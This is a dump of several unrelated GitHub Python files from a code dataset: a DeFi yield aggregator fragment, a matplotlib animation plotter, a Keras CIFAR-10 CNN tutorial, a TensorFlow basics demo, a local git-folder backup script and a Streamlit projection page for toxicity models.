List[CrvUsdYield]:\n try:\n convex_yields = get_latest_convex_pool_apr()\n except Exception as e:\n logger.error(f\"Error fetching Convex yields : {e}\")\n convex_yields = []\n try:\n curve_yields = get_max_boost_curve_yield()\n except Exception as e:\n logger.error(f\"Error fetching Curve yields : {e}\")\n curve_yields = []\n try:\n std_yields = get_std_yields()\n except Exception as e:\n logger.error(f\"Error fetching StakeDAO yields : {e}\")\n std_yields = []\n\n return convex_yields + curve_yields + std_yields\n","repo_name":"convex-community/subgraphs-api","sub_path":"app/services/curve/yields.py","file_name":"yields.py","file_ext":"py","file_size_in_byte":2798,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"}
+{"seq_id":"16765341612","text":"\"\"\"Offer a field plotter.\"\"\"\nimport copy\nimport warnings\nfrom typing import Any, Callable, Dict, Iterable, List, Optional, Sequence, Union\n\nimport numpy as np\nimport numpy.typing as npt\nfrom matplotlib import colors\nfrom matplotlib.animation import FuncAnimation\nfrom matplotlib.axes import Axes\nfrom matplotlib.colorbar import Colorbar\nfrom matplotlib.figure import Figure, SubFigure\nfrom matplotlib.image import AxesImage\nfrom matplotlib.lines import Line2D\nfrom matplotlib.text import Text\n\nfrom nested_grid_plotter.base_plotter import NestedGridPlotter\nfrom nested_grid_plotter.imshow import (\n _apply_default_colorbar_kwargs,\n _apply_default_imshow_kwargs,\n _check_axes_and_data_consistency,\n _scale_cbar,\n)\n\n# pylint: disable=C0103 # does not confrom to snake case naming style\n# pylint: disable=R0913 # too many arguments\n# pylint: disable=R0914 # too many local variables\n\n# Define some types for numpy\nNDArrayFloat = npt.NDArray[np.float64]\nNDArrayInt = npt.NDArray[np.int64]\n\n\ndef _get_nb_frames(nb_frames: Optional[int], nb_steps: int) -> int:\n \"\"\"\n Get the correct number of frames.\n\n Parameters\n ----------\n nb_frames : Optional[int]\n Number of frames to plot. If None, then the number of steps is used.\n nb_steps : int\n Number of steps (data arrays available for plot).\n\n Returns\n -------\n int\n The correct number of frames.\n\n Raises\n ------\n warnings.warn\n If the nb_frames required exceeds the number of steps.\n \"\"\"\n if nb_frames is None:\n return nb_steps\n if nb_frames > nb_steps:\n warnings.warn(\n UserWarning(\n f\"The nb_frames ({nb_frames}) required exceeds the number of steps\"\n f\" available (last dimension of arrays = {nb_steps})!\"\n \" Some images will be repeated.\"\n )\n )\n return nb_frames\n\n\nclass AnimatedPlotter(NestedGridPlotter):\n \"\"\"Nestedgrid plotter with embedded animation support.\"\"\"\n\n _animation: Optional[FuncAnimation]\n\n def __init__(\n self,\n fig_params: Optional[Dict[str, Any]] = None,\n subfigs_params: Optional[Dict[str, Any]] = None,\n subplots_mosaic_params: Optional[Dict[str, Any]] = None,\n ) -> None:\n \"\"\"\n Initiate the instance.\n\n Parameters\n ----------\n fig_params : Optional[Dict[str, Any]], optional\n See :class:`NestedGridPlotter` for other possible arguments.\n The default is None.\n subfigs_params : Optional[Dict[str, Any]], optional\n DESCRIPTION. The default is None.\n subplots_mosaic_params : Optional[Dict[str, Any]], optional\n DESCRIPTION. 
The default is None.\n\n Returns\n -------\n None\n \"\"\"\n _fig_params = dict(constrained_layout=True)\n if fig_params is not None:\n _fig_params.update(fig_params)\n\n super().__init__(_fig_params, subfigs_params, subplots_mosaic_params)\n # self.fig.patch.set_facecolor(\"w\")\n self.init_animations_list: List[Callable] = []\n self.animations_list: List[Callable] = []\n self.animation = None\n\n @property\n def animation(self) -> FuncAnimation:\n \"\"\"Get the animation or raise an attribute error if not defined.\"\"\"\n if self._animation is None:\n raise AttributeError(\"No animation as been defined !\")\n return self._animation\n\n @animation.setter\n def animation(self, animation: Optional[FuncAnimation]) -> None:\n self._animation = animation\n\n def _init_animate(self) -> List[Union[Line2D, AxesImage]]:\n \"\"\"Only required for blitting to give a clean slate.\"\"\"\n return [f for f_list in self.init_animations_list for f in f_list()]\n\n def _animate(self, i) -> List[Union[Line2D, AxesImage]]:\n \"\"\"Update the data of the plot.\"\"\"\n return [f for f_list in self.animations_list for f in f_list(i)]\n\n def animate(self, nb_frames: int, blit: bool = True) -> FuncAnimation:\n \"\"\"\n Animate the plot.\n\n Parameters\n ----------\n nb_frames : int\n The number of frames to consider for the animation.\n blit: bool, optional\n Whether blitting is used to optimize drawing. Note: when using blitting,\n any animated artists will be drawn according to their zorder; however,\n they will be drawn on top of any previous artists, regardless of their\n zorder. The default is True.\n\n Returns\n -------\n animation.FuncAnimation\n The animation.\n\n \"\"\"\n # plt.close(self.fig)\n self.animation = FuncAnimation(\n self.fig,\n self._animate,\n init_func=self._init_animate,\n frames=range(nb_frames),\n interval=1,\n blit=blit,\n repeat=False,\n )\n return self.animation\n\n def plot_animated_text(\n self, ax: Axes, x: float, y: float, s: Sequence[str], **kwargs: Any\n ) -> None:\n \"\"\"\n Add a text animation to the given axis.\n\n Parameters\n ----------\n ax : Axes\n Axis to which add the text.\n x : float\n x position of the text.\n y : float\n y position of the text.\n s : Sequence[str]\n Sequence of text value to display.\n **kwargs : Dict[str, Any]\n Optional arguments for the class:`Text`.\n\n Returns\n -------\n None\n\n \"\"\"\n txt: Text = ax.text(x, y, s[0], **kwargs)\n\n def _animate(frame: int) -> List[Text]:\n \"\"\"Update the text value.\"\"\"\n txt.set_text(s[frame])\n return [\n txt,\n ]\n\n # self.init_animations_list.append(_init)\n self.animations_list.append(_animate)\n\n def animated_multi_plot(\n self,\n ax_name: str,\n data: Dict[str, Dict[str, Any]],\n nb_frames: Optional[int] = None,\n title: Optional[str] = None,\n xlabel: Optional[str] = None,\n ylabel: Optional[str] = None,\n ) -> None:\n \"\"\"\n Plot a 1D animated curves.\n\n The number of frames can be determined automatically from the data.\n\n Parameters\n ----------\n ax_name : str\n Name of the axis on which to plot the animation.\n data : Dict[str, Dict[str, Any]]]\n Data to be plotted.\n nb_frames: int\n Number of frames to use in the animation. If None, the second dimension of\n the provided data arrays is used.\n title : Optional[str], optional\n Title to give to the plot. The default is None.\n xlabel : Optional[str], optional\n Label for the xaxis. The default is None.\n ylabel : Optional[str], optional\n Label for the yaxis. 
The default is None.\n\n Raises\n ------\n ValueError\n If the provided `data` dictionary contains inconsistent arrays.\n\n Returns\n -------\n None\n\n \"\"\"\n ax: Axes = self.ax_dict[ax_name]\n\n # store all data in a list\n x_list: List[NDArrayFloat] = []\n y_list: List[NDArrayFloat] = []\n # The results are stored in plot_dict and allow updating the values.\n plot_dict = {}\n\n for label, val in data.items():\n kwargs: Dict[str, Any] = val.get(\"kwargs\", {})\n x = val.get(\"x\", None)\n _val = val.get(\"y\")\n if _val is not None:\n y: NDArrayFloat = _val\n else:\n raise ValueError(\n f'Error with data arguments: for key \"{label}\" y must be given!'\n )\n\n # Generate a series to adjust the y axis bounds without setting\n # y_extend = np.nanmax(y_list) - np.nanmin(y_list)\n y_extend = np.linspace(np.nanmin(y), np.nanmax(y), y.shape[0])\n\n if x is not None:\n x_extend = np.linspace(np.nanmin(x), np.nanmax(x), x.shape[0])\n x_list.append(x.reshape(x.shape[0], -1)) # make sure that x is 2d\n else:\n x_extend = np.arange(y.shape[0])\n plot_dict[label] = ax.plot(x_extend, y_extend, label=label, **kwargs)[0]\n y_list.append(y)\n\n nb_steps: int = y_list[0].shape[1]\n\n # Number of x and y consistency\n if len(x_list) != 0 and (len(x_list) != len(y_list)):\n raise ValueError(\n \"When the x vector is provided, it must be for each y vector!\"\n )\n\n # Check that all arrays have the same number of frames\n if not all((y_list[0].shape[1] == y.shape[1] for y in y_list[1:])):\n raise ValueError(\n \"Not all given y arrays have the same number of steps (last dimension)!\"\n )\n if len(x_list) > 1:\n if not all((x_list[0].shape[1] == x.shape[1] for x in x_list[1:])):\n raise ValueError(\n \"Not all given x arrays have the same number \"\n \"of steps (last dimension)!\"\n )\n\n # Check the dimensions\n if not all((y_list[0].shape[0] == y.shape[0] for y in y_list[1:])):\n raise ValueError(\n \"Not all given y arrays have the same first dimension (n values)!\"\n )\n\n if title:\n ax.set_title(title, fontweight=\"bold\")\n if xlabel:\n ax.set_xlabel(xlabel, fontweight=\"bold\")\n if ylabel:\n ax.set_ylabel(ylabel, fontweight=\"bold\")\n\n def _init() -> List[Line2D]:\n \"\"\"Only required for blitting to give a clean slate.\"\"\"\n for label in data.keys():\n plot_dict[label].set_ydata(\n np.full(y_list[0][:, 0].size, fill_value=np.nan),\n )\n return list(plot_dict.values())\n\n _nb_frames: int = _get_nb_frames(nb_frames, nb_steps)\n\n def _animate(frame_index: int) -> List[Line2D]:\n \"\"\"Update the data of the plot.\"\"\"\n # subtract -1 to nb_steps and _nb_frames so that when\n # frame_index = 0, we get the first element of x_list, and when\n # frame_index = _nb_frames - 1, we get the last element of x_list.\n data_index: int = int((nb_steps - 1) / (_nb_frames - 1) * frame_index)\n for index, label in enumerate(data.keys()):\n # update x\n if len(x_list) != 0:\n try:\n plot_dict[label].set_xdata(x_list[index][:, data_index])\n except IndexError:\n pass\n # update y\n plot_dict[label].set_ydata(\n y_list[index][:, data_index],\n )\n return list(plot_dict.values())\n\n self.init_animations_list.append(_init)\n self.animations_list.append(_animate)\n\n def animated_multi_imshow(\n self,\n ax_names: Iterable[str],\n data: Dict[str, NDArrayFloat],\n fig: Optional[Union[Figure, SubFigure]] = None,\n nb_frames: Optional[int] = None,\n xlabel: Optional[str] = None,\n ylabel: Optional[str] = None,\n imshow_kwargs: Optional[Dict[str, Any]] = None,\n cbar_kwargs: Optional[Dict[str, Any]] = None,\n 
is_symetric_cbar: bool = False,\n cbar_title: Optional[str] = None,\n ) -> Colorbar:\n \"\"\"\n Plot an animated 2D field with imshow.\n\n The number of frames can be determined automatically from the data.\n\n Parameters\n ----------\n ax_names : str\n List of axis names in which to plot the data. The order of axes must be\n the same as that of the data.\n data : Dict[str, Union[np.ndarray, Dict[str, Any]]]\n Data to be plotted.\n fig: Optional[Figure, SubFigure]\n Which figure to consider for the color bar. By default, use self.fig.\n nb_frames : Optional[int]\n Number of frame to use. By default, it is the number of provided steps,\n that is to say the last dimension of the arrays. If the number of frames\n exceeds the number of steps available, some steps will be repeated once\n or more and a warning is raised.\n xlabel : Optional[str], optional\n Label to apply to all xaxes. The default is None.\n ylabel : Optional[str], optional\n Label to apply to all yaxes. The default is None.\n imshow_kwargs: Optional[Dict[str, Any]] optional\n Optional arguments for `plt.imshow`. The default is None.\n\n Examples\n --------\n Examples can be given using either the ``Example`` or ``Examples``\n sections. Sections support any reStructuredText formatting, including\n literal blocks::\n\n $ python example_numpy.py\n\n Raises\n ------\n ValueError\n If the provided `data` dictionary contains inconsistent arrays.\n\n Returns\n -------\n None\n\n \"\"\"\n axes: list[Axes] = [self.ax_dict[ax_name] for ax_name in ax_names]\n # The number of ax_name and data provided should be the same:\n _check_axes_and_data_consistency(axes, data)\n\n # Add some default values for imshow and colorbar\n _imshow_kwargs: Dict[str, Any] = _apply_default_imshow_kwargs(imshow_kwargs)\n _cbar_kwargs: Dict[str, Any] = _apply_default_colorbar_kwargs(cbar_kwargs, axes)\n\n # store all data in a list\n data_list = []\n # The results are stored in plot_dict and allow updating the values.\n\n images_dict: Dict[str, AxesImage] = {}\n for j, (label, values) in enumerate(data.items()):\n ax = self.ax_dict[ax_names[j]]\n if not len(values.shape) == 3:\n raise ValueError(\n f'The given data for \"{label}\" has shape {values.shape} '\n \"whereas it should be three dimensional!\"\n )\n\n # Need to transpose because the dimensions (M, N) define the rows and\n # columns\n # Also, need to copy the _imshow_kwargs to avoid its update. 
Otherwise the\n # colorbar scaling does not work properly\n images_dict[label] = ax.imshow(\n values[:, :, 0].T, **copy.deepcopy(_imshow_kwargs)\n )\n data_list.append(values)\n\n ax.label_outer()\n ax.set_title(label, weight=\"bold\")\n if xlabel is not None:\n ax.set_xlabel(xlabel, fontweight=\"bold\")\n if ylabel is not None:\n ax.set_ylabel(ylabel, fontweight=\"bold\")\n\n nb_steps: int = data_list[0].shape[2]\n\n # Check that all arrays have the same number of timesteps\n if not all((nb_steps == x.shape[2] for x in data_list[1:])):\n raise ValueError(\n \"Not all given arrays have the same number of steps (last dimension)!\"\n )\n\n # Colorbar scaling\n norm: Optional[colors.Normalize] = _imshow_kwargs.get(\"norm\")\n if norm is not None:\n vmin: Optional[float] = norm.vmin\n vmax: Optional[float] = norm.vmax\n if isinstance(norm, colors.LogNorm):\n _scale_cbar(\n list(images_dict.values()),\n list(data.values()),\n False,\n is_log=True,\n vmin=vmin,\n vmax=vmax,\n )\n elif isinstance(_imshow_kwargs.get(\"norm\"), colors.Normalize):\n _scale_cbar(\n list(images_dict.values()),\n list(data.values()),\n is_symetric_cbar,\n vmin=vmin,\n vmax=vmax,\n )\n\n if fig is None:\n _fig: Union[Figure, SubFigure] = self.fig\n else:\n _fig: Union[Figure, SubFigure] = fig\n\n # pylint: disable=C0123 # use isinstance instead\n cbar: Colorbar = _fig.colorbar(list(images_dict.values())[0], **_cbar_kwargs)\n if cbar_title is not None:\n cbar.ax.get_yaxis().labelpad = 20\n cbar.ax.set_ylabel(cbar_title, rotation=270)\n\n def _init() -> List[AxesImage]:\n \"\"\"Only required for blitting to give a clean slate.\"\"\"\n for label, values in data.items():\n images_dict[label].set_data(\n np.full(values[:, :, 0].T.shape, fill_value=np.nan),\n )\n return list(images_dict.values())\n\n _nb_frames: int = _get_nb_frames(nb_frames, nb_steps)\n\n def _animate(frame_index: int) -> List[AxesImage]:\n \"\"\"Update the data of the plot.\"\"\"\n # subtract -1 to nb_steps and _nb_frames so that when\n # frame_index = 0, we get the first element of x_list, and when\n # frame_index = _nb_frames - 1, we get the last element of x_list.\n data_index: int = int((nb_steps - 1) / (_nb_frames - 1) * frame_index)\n for label in data.keys():\n images_dict[label].set_data(\n data[label][:, :, data_index].T,\n )\n return list(images_dict.values())\n\n self.init_animations_list.append(_init)\n self.animations_list.append(_animate)\n\n return cbar\n","repo_name":"antoinecollet5/nested_grid_plotter","sub_path":"nested_grid_plotter/animated_plotter.py","file_name":"animated_plotter.py","file_ext":"py","file_size_in_byte":17421,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"}
+{"seq_id":"37216384037","text":"import matplotlib.pyplot as plt\nfrom tensorflow.keras.datasets import cifar10\n\n# The dataset contains 50,000 training images and 10,000 test images.\n# Loading the dataset:\nprint('CIFAR-10 Dataset!')\n(train_X, train_Y), (test_X, test_Y) = cifar10.load_data()\n\n# CIFAR-10 contains these classes:\nclass_names = ['airplane', 'automobile', 'bird', 'cat', 'deer', 'dog', 'frog', 'horse', 'ship', 'lorry']\n\n# -----------------------------\n# This function will display the first 16 images of the dataset with their labels:\ndef visualize_data(train_X, train_Y, class_names):\n\n for i in range(16):\n # create subplot:\n plt.subplot(4, 4, i+1)\n plt.xticks([])\n plt.yticks([])\n # plot image with the class name on the x-axis:\n plt.imshow(train_X[i])\n plt.xlabel(class_names[train_Y[i].item()])\n\n # adjust the subplots and show the first 16 images:\n plt.subplots_adjust(left=0.125,\n bottom=0.1, \n right=0.9, \n top=0.9, \n wspace=0.2, \n hspace=0.35)\n plt.show()\n# -----------------------------\n\n# Displaying the first sixteen images within the dataset:\nvisualize_data(train_X, train_Y, class_names)\n\n# Printing information about the loaded dataset:\nprint(f'There are {train_X.shape[0]} images of size {train_X.shape[1:]} in the Training set of the CIFAR-10 Dataset.')\nprint(f'There are {test_X.shape[0]} images of size {test_X.shape[1:]} in the Test set of the CIFAR-10 Dataset.')\n\n\"\"\"Now that the dataset has been verified, we can begin preparing for the training process. First, let's import all that we need:\"\"\"\n\nimport matplotlib.pyplot as plt\nfrom tensorflow.keras.datasets import cifar10\nfrom tensorflow.keras.utils import to_categorical\nfrom tensorflow.keras.models import Sequential\nfrom tensorflow.keras.layers import Conv2D\nfrom tensorflow.keras.layers import MaxPooling2D\nfrom tensorflow.keras.layers import Dense\nfrom tensorflow.keras.layers import Flatten\nfrom tensorflow.keras.optimizers import SGD\nfrom tensorflow import keras\nimport tensorflow as tf\n\nprint('Keras version:', keras.__version__)\nprint(\"Num GPUs Available: \", len(tf.config.experimental.list_physical_devices('GPU')))\n\n\"\"\"We now define two functions that will load and process the data in preparation for training:\"\"\"\n\n# Function used to load the dataset:\ndef load_data():\n\n # Loading the built-in CIFAR-10 dataset from Keras:\n (train_X, train_Y), (test_X, test_Y) = cifar10.load_data()\n\n print('The dataset has been loaded:')\n print(f'Train: X={train_X.shape}, Y={train_Y.shape}')\n print(f'Test: X={test_X.shape}, Y={test_Y.shape}')\n\n # Converting the class labels to one hot vectors:\n train_Y = to_categorical(train_Y)\n test_Y = to_categorical(test_Y)\n\n return train_X, train_Y, test_X, test_Y\n \n# -----------------------------\n\n# Function used to prepare the data:\ndef pre_process_data(train_data, test_data):\n\n # Casting pixel values to floats:\n train_data = train_data.astype('float32')\n test_data = test_data.astype('float32')\n\n # normalising pixel values to range [0-1]\n train_data = train_data / 255.0\n test_data = test_data / 255.0\n\n print(f'Train data is in range {train_data.min()} to {train_data.max()}.')\n print(f'Test data is in range {test_data.min()} to {test_data.max()}.')\n\n return train_data, test_data\n\nprint('Done!')\n\n\"\"\"We will also define a function responsible for plotting the curves:\"\"\"\n\n# Function used to plot the curves for loss and accuracy:\ndef plot_curves(history):\n\n # Plotting the loss curve:\n 
plt.subplot(211)\n plt.title('Cross Entropy')\n plt.ylabel('loss')\n plt.xlabel('epoch')\n # Plotting the training loss (blue):\n plt.plot(history.history['loss'], color='blue', label='train')\n # Plotting the test loss (red):\n plt.plot(history.history['val_loss'], color='red', label='test')\n # Legend for the plot:\n plt.legend(['train', 'test'], loc='upper left')\n\n # Plotting the accuracy curve:\n plt.subplot(212)\n plt.title('Classification Accuracy')\n plt.ylabel('accuracy')\n plt.xlabel('epoch')\n # Plotting the training accuracy (blue):\n plt.plot(history.history['accuracy'], color='blue', label='train')\n # Plotting the test accuracy (red):\n plt.plot(history.history['val_accuracy'], color='red', label='test')\n # Legend for the plot:\n plt.legend(['train', 'test'], loc='upper left')\n\n plt.subplots_adjust(top=3)\n plt.show()\n\nprint('Done!')\n\n\"\"\"Now we are ready to design our model architecture.\n\nThe architecture comprises **three CONV layers** with **RELU activation functions**, each followed by **Max Pooling** layers. At the end, there is a **fully-connected** classifier that will classify the input into one of 10 outputs, using **cross entropy** as the loss function:\n\"\"\"\n\n# This function defines our neural network:\ndef create_model():\n\n model = Sequential()\n\n # The first conv layer with 32 kernels of 3*3 receiving an input of 32*32*3:\n model.add(Conv2D(32, (3, 3), activation='relu', kernel_initializer='he_uniform', padding='same', input_shape=(32, 32, 3)))\n\n # Max pooling layer with a kernel of 2*2 and a stride of 2:\n model.add(MaxPooling2D((2, 2)))\n\n # Conv layer with 64 kernels of 3*3:\n model.add(Conv2D(64, (3, 3), activation='relu', kernel_initializer='he_uniform', padding='same'))\n\n # Max pooling layer with a kernel of 2*2 and a stride of 2:\n model.add(MaxPooling2D((2, 2)))\n\n # Conv layer with 128 kernels of 3*3:\n model.add(Conv2D(128, (3, 3), activation='relu', kernel_initializer='he_uniform', padding='same'))\n\n # Max pooling layer with a kernel of 2*2 and a stride of 2:\n model.add(MaxPooling2D((2, 2)))\n\n # The feature maps are flattened at this point to be passed into fully-connected layers:\n model.add(Flatten())\n\n # Fully-connected layers leading to 10 classes with a softmax activation function:\n model.add(Dense(128, activation='relu', kernel_initializer='he_uniform'))\n model.add(Dense(10, activation='softmax'))\n\n # The optimiser is stochastic gradient descent with a learning rate of f 0.001 and a momentum of 0.9:\n optim = SGD(lr=0.001, momentum=0.9)\n\n # The model optimises cross entropy as its loss function and will monitor classification accuracy:\n model.compile(optimizer=optim, loss='categorical_crossentropy', metrics=['accuracy'])\n\n # Printing model summary:\n print(model.summary())\n\n return model\n\nprint('Done!')\n\n\"\"\"Now that all preparations are made and the model has been designed, it is time to start training the model.\n\nFirst, let's load the dataset:\n\"\"\"\n\ntrainX, trainY, testX, testY = load_data()\n\n\"\"\"Now, we pre-process the images using the function we defined earlier:\"\"\"\n\ntrainX, testX = pre_process_data(trainX, testX)\n\n\"\"\"Let's create the model:\"\"\"\n\nmodel = create_model()\n\n\"\"\"The model can now be trained for 20 epochs with a batch size of 64:\"\"\"\n\nhistory = model.fit(trainX, trainY, epochs=20, batch_size=64, validation_data=(testX, testY))\nprint('Done!')\n\n\"\"\"After the training is complete, we can evaluate the model on the test set and obtain the final 
accuracy level:\"\"\"\n\n_, acc = model.evaluate(testX, testY, verbose=1)\nprint('Accuracy: %.3f' % (acc * 100.0))\n\n\"\"\"We can plot the loss and accuracy curves to better analyse the training process.\n\nThe **blue** curves indicate performance over the **training data** and the *red* curves represent model performance over the *test data*:\n\"\"\"\n\nplot_curves(history)","repo_name":"atapour/keras-dl-examples","sub_path":"simple-cnn/cnn.py","file_name":"cnn.py","file_ext":"py","file_size_in_byte":7367,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"16"}
+{"seq_id":"22030091439","text":"from __future__ import print_function\nimport tensorflow as tf\nimport os\nimport numpy as np\n\n\ntf.flags.DEFINE_string(\n 'log_dir', os.path.dirname(os.path.abspath(__file__)) + '/logs',\n 'Directory where event logs are written to.')\n\nFLAGS = tf.flags.FLAGS\n\n\nif not os.path.isabs(os.path.expanduser(FLAGS.log_dir)):\n raise ValueError('You must assign absolute path for --log_dir')\n'''----------------------------------------------------------------------------------'''\n\n# tf.constant\n# 定义一些常量\na = tf.constant(5, name=\"a\")\nb = tf.constant(10, name=\"b\")\ntensor_a = 5*tf.ones([5, 5])\ntensor_b = 3*tf.ones([5, 5])\n\n# 一些基本的运算\nx = tf.add(a, b, name=\"add\")\ny = tf.div(a, b, name=\"divide\")\n\n'''----------------------------------------------------------------------------------'''\n\n# Run the session\nwith tf.Session() as sess:\n writer = tf.summary.FileWriter(os.path.expanduser(FLAGS.log_dir), sess.graph)\n print(\"a =\", sess.run(a))\n print(\"b =\", sess.run(b))\n print(\"a + b =\", sess.run(x))\n print(\"a/b =\", sess.run(y))\n\n# Closing the writer.\nwriter.close()\nsess.close()\n\n","repo_name":"AtticusJohnson/TensorFlowLearning","sub_path":"PracticeCode/Tensorflow-Course/1-basic_math_operation.py","file_name":"1-basic_math_operation.py","file_ext":"py","file_size_in_byte":1111,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"}
+{"seq_id":"69969433290","text":"import os\r\nimport time\r\nimport zipfile\r\n\r\nworkSpace = \"/Users/alphahinex/workspace\"\r\nbackupRoot = \"/Users/alphahinex/github/trunk/gitbackup/backup\"\r\nweek = time.strftime(\"%w\")\r\nbackupPath = os.path.join(backupRoot, week)\r\n\r\n# clean zip file which is a week ago\r\ndelCommand = \"rm -f \" + os.path.join(backupRoot,week + \".zip\")\r\nos.system(delCommand)\r\n\r\n# get all .git root path\r\nfirstLvs = os.listdir(workSpace)\r\nsrcDirs = []\r\nfor firstdir in firstLvs:\r\n if(os.path.isdir(os.path.join(workSpace,firstdir))):\r\n for secdir in os.listdir(os.path.join(workSpace,firstdir)):\r\n if(secdir.find('git')>0):\r\n if(os.path.isdir(os.path.join(workSpace,firstdir,secdir))):\r\n srcDirs.append(firstdir)\r\n\r\n# copy .git folder\r\nfor folder in srcDirs:\r\n copyCommand = \"mkdir -p \" + os.path.join(backupPath, folder) + \" && \"\r\n copyCommand += \"cp -R \" + os.path.join(workSpace,folder,\".git\") + \" \" + os.path.join(backupPath,folder,\".git\")\r\n os.system(copyCommand)\r\n\r\n# zip the backup folder\r\nfilelist = []\r\nfor root, dirs, files in os.walk(backupPath):\r\n for name in files:\r\n filelist.append(os.path.join(root,name))\r\n\r\nzf = zipfile.ZipFile(os.path.join(backupRoot,week+\".zip\"),\"w\",zipfile.zlib.DEFLATED)\r\nfor fileToZip in filelist:\r\n zf.write(fileToZip)\r\nzf.close()\r\n\r\n# clean temp folder\r\nrdCommand = \"rm -rf \" + backupPath\r\nos.system(rdCommand)","repo_name":"AlphaHinex/trunk","sub_path":"gitbackup/backupgit_unix_py2_v1.py","file_name":"backupgit_unix_py2_v1.py","file_ext":"py","file_size_in_byte":1401,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"}
+{"seq_id":"39262820460","text":"import streamlit as st\nimport io\nimport pandas as pd\nimport numpy as np\nfrom custom_download_button import download_button\nfrom inference_utils.plots_for_space import PlotPCA_CLSProjection, PlotUMAP_CLSProjection, PlotPaCMAP_CLSProjection\n\n\neffectordering = {\n 'EC50_algae': {'POP':'POP'},\n 'EC10_algae': {'POP':'POP'},\n 'EC50EC10_algae': {'POP':'POP'}, \n 'EC50_invertebrates': {'MOR':'MOR','ITX':'ITX'},\n 'EC10_invertebrates': {'MOR':'MOR','DVP':'DVP','ITX':'ITX', 'REP': 'REP', 'MPH': 'MPH', 'POP': 'POP'} ,\n 'EC50EC10_invertebrates': {'MOR':'MOR','DVP':'DVP','ITX':'ITX', 'REP': 'REP', 'MPH': 'MPH', 'POP': 'POP'} ,\n 'EC50_fish': {'MOR':'MOR'},\n 'EC10_fish': {'MOR':'MOR','DVP':'DVP','ITX':'ITX', 'REP': 'REP', 'MPH': 'MPH', 'POP': 'POP','GRO': 'GRO'} ,\n 'EC50EC10_fish': {'MOR':'MOR','DVP':'DVP','ITX':'ITX', 'REP': 'REP', 'MPH': 'MPH', 'POP': 'POP','GRO': 'GRO'} \n }\n\nendpointordering = {\n 'EC50_algae': {'EC50':'EC50'},\n 'EC10_algae': {'EC10':'EC10'},\n 'EC50EC10_algae': {'EC50':'EC50', 'EC10': 'EC10'}, \n 'EC50_invertebrates': {'EC50':'EC50'},\n 'EC10_invertebrates': {'EC10':'EC10'},\n 'EC50EC10_invertebrates': {'EC50':'EC50', 'EC10': 'EC10'},\n 'EC50_fish': {'EC50':'EC50'},\n 'EC10_fish': {'EC10':'EC10'},\n 'EC50EC10_fish': {'EC50':'EC50', 'EC10': 'EC10'} \n }\n\ndef print_space_page():\n col1, col2 = st.columns((1,3))\n with col1:\n st.markdown('## Projection metrics')\n projection = st.selectbox('Projection method', ('PCA','UMAP'))\n species_group = {'fish': 'fish', 'aquatic invertebrates': 'invertebrates', 'algae': 'algae'}\n model_type = {'Combined model (best performance)': 'EC50EC10'}\n \n PREDICTION_SPECIES = species_group[st.radio(\"Select Species group\", tuple(species_group.keys()), on_change=None, help=\"Don't know which to use? 
\\n Check the `Species groups` section under `Documentation`\")]\n MODELTYPE = model_type[st.radio(\"Select Model type\", tuple(model_type), on_change=None, help=\"Don't know which to use?\\n Check the `Models` section under `Documentation`\")]\n endpoints = endpointordering[f'{MODELTYPE}_{PREDICTION_SPECIES}']\n effects = effectordering[f'{MODELTYPE}_{PREDICTION_SPECIES}']\n PREDICTION_ENDPOINT = endpoints[st.radio(\"Select Endpoint \",tuple(endpoints.keys()), on_change=None, help=\"Don't know which to use?\\n Check the `Endpoints` section under `Documentation`\")]\n PREDICTION_EFFECT = effects[st.radio(\"Select Effect \",tuple(effects.keys()), on_change=None, help=\"Don't know which to use?\\n Check the `Effects` section under `Documentation`\")]\n \n PREDICTION_EXTENDED_DATA = st.checkbox('show predictions outside training data')\n if projection == 'UMAP':\n MIN_DISTNACE = st.number_input('min distance')\n N_NEIGHBORS = st.number_input('n neighbors')\n\n run_prediction = st.button('Predict')\n \n with col2:\n if run_prediction:\n with st.spinner(text = 'Inference in Progress...'):\n if projection == 'PCA':\n fig = PlotPCA_CLSProjection(model_type=MODELTYPE, endpoint=PREDICTION_ENDPOINT, effect=PREDICTION_EFFECT, species_group=PREDICTION_SPECIES, show_all_predictions=PREDICTION_EXTENDED_DATA, inference_df=None)\n st.plotly_chart(fig, use_container_width=True, theme='streamlit')\n \n if projection == 'UMAP':\n fig = PlotUMAP_CLSProjection(model_type=MODELTYPE, endpoint=PREDICTION_ENDPOINT, effect=PREDICTION_EFFECT, species_group=PREDICTION_SPECIES, show_all_predictions=PREDICTION_EXTENDED_DATA, inference_df=None, n_neighbors=N_NEIGHBORS, min_dist=MIN_DISTNACE)\n st.plotly_chart(fig, use_container_width=True, theme='streamlit')\n \n if projection == 'PaCMAP':\n fig = PlotPaCMAP_CLSProjection(model_type=MODELTYPE, endpoint=PREDICTION_ENDPOINT, effect=PREDICTION_EFFECT, species_group=PREDICTION_SPECIES, show_all_predictions=PREDICTION_EXTENDED_DATA, inference_df=None)\n st.plotly_chart(fig, use_container_width=True, theme='streamlit')\n\n buffer = io.StringIO()\n fig.write_html(buffer, include_plotlyjs='cdn')\n html_bytes = buffer.getvalue().encode()\n\n download_button_str = download_button(html_bytes, 'interactive_CLS_projection.html', 'Lagging ➡ Download HTML', pickle_it=False)\n st.markdown(download_button_str, unsafe_allow_html=True)\n","repo_name":"StyrbjornKall/TRIDENT_application","sub_path":"space_page.py","file_name":"space_page.py","file_ext":"py","file_size_in_byte":4702,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"}
